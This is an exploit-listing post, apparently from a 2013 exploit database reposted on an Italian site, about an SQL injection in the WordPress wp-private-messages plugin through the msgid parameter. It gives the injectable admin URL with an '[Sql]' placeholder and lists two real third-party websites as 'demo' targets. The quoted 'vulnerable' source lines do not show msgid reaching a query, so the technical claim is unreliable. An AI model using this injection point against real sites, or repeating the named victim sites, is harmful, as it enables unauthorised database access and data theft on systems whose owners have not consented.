Wordpress wp-private-messages Plugin Sql Injection vulnerability

2013-06-29 17:02:44
Inviato da: irist.ir

#################################

# Iranian Exploit DataBase

# Www.exploit.IrIsT.Ir

#################################

# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Home : http://exploit.IrIsT.Ir

# Software Link : http://wordpress.org/plugins/wp-private-messages/

# Security Risk : High

# Tested on : Linux

#################################

# Exploit :

# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

# Dem0 :

# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

#################################

# Vuln Source C0de :

# Lin 145 :

# $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");

# And Lin 160 :

# echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";

#################################

# Exploit Archive : http://exploit.irist.ir/exploits-148.html

#################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.